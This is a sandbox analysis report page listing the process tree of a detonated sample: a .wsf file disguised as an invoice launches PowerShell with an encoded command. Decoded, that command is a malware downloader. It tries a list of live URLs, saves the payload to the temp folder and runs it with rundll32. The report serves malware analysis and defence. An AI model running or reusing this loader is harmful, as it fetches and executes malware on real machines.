popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\AprilINV(P8398).wsf

    300

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAUwBwAGgAeQBnAG0AbwBtAGEAbgBvAG0AZQB0AGUAcgBIAGEAaQBsAGUAcgBzACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBoAGkAcgB0AHMAdQBtAG0AaQB0AC4AYwBvAG0ALwBNAHcAQgBHAFMAbQAvAFgANAAzAFMAOQB0AEsAbABHADkAaABaACwAaAB0AHQAcAA6AC8ALwByAG8AcwBlAHcAbwBvAGQAbABhAG0AaQBuAGEAdABlAHMALgBjAG8AbQAvAGgAZQBhAC8AcwBmAGgAYwBDAGcALABoAHQAdABwAHMAOgAvAC8AcAByAG8AcABlAHIAdAB5AG4AZQBhAHIALgBjAG8ALgB1AGsALwBRAHkAWQBXAHkAcAAvAEYAQwBRAGkAbgBkAG0ALABoAHQAdABwAHMAOgAvAC8AYQBnAHQAZQBuAGQAZQBsAHAAZQByAHUALgBjAG8AbQAvAEYAUAB1ADAARgBhAC8AeQBXAG0ATgByAEoAYwA4AFEARQAsAGgAdAB0AHAAcwA6AC8ALwBnAHIAYQBmAGkAYwBhAGwAZQB2AGkALgBjAG8AbQAuAGIAcgAvADAAcAA2AFAALwAxAGIARQBUAGcAMQAsAGgAdAB0AHAAcwA6AC8ALwBjAGEAcABpAHQAYQBsAHAAZQByAHUAcgByAGgAaAAuAGMAbwBtAC8AdgBRADEAaQBRAGcALwBPAEIAWABRAEYAQwBnAFcALABoAHQAdABwAHMAOgAvAC8AawBtAHAAaABpAC4AYwBvAG0ALwBGAFcAbwB2AG0AQgAvAFgAMgA4AHkAeQBVAEwAcQAsAGgAdAB0AHAAcwA6AC8ALwBjAGUAbgB0AGUAcgBrAGkAYwBrAC4AYwBvAG0ALwBJAEMANQBFAFEAOAAvADUAZQB4AG8AcwAsAGgAdAB0AHAAcwA6AC8ALwBjAGgAaQBtAHAAYwBpAHQAeQAuAGMAbwBtAC8AaAA3AGUALwBaAEwAdQAxAEsAcAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AaQBuAHMAdABpAG4AYwB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBkAGkAbQBlAHQAcgBpAGMAIABpAG4AIAAkAFMAcABoAHkAZwBtAG8AbQBhAG4AbwBtAGUAdABlAHIASABhAGkAbABlAHIAcwApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAdQBuAGkAbgBzAHQAaQBuAGMAdABpAHYAZQBuAGUAcwBzAE0AbwBuAG8AZABpAG0AZQB0AHIAaQBjACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA5ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABMAHUAYwBpAG4AYQBjAGUAYQAuAG0AdQBsAHQAaQBsAGkAdABoAE0AYQBqAG8AcgBpAHMAbQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEwAdQBjAGkAbgBhAGMAZQBhAC4AbQB1AGwAdABpAGwAaQB0AGgATQBhAGoAbwByAGkAcwBtACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAEwAdQBjAGkAbgBhAGMAZQBhAC4AbQB1AGwAdABpAGwAaQB0AGgATQBhAGoAbwByAGkAcwBtACwAWAA1ADUANQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"

      2088

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf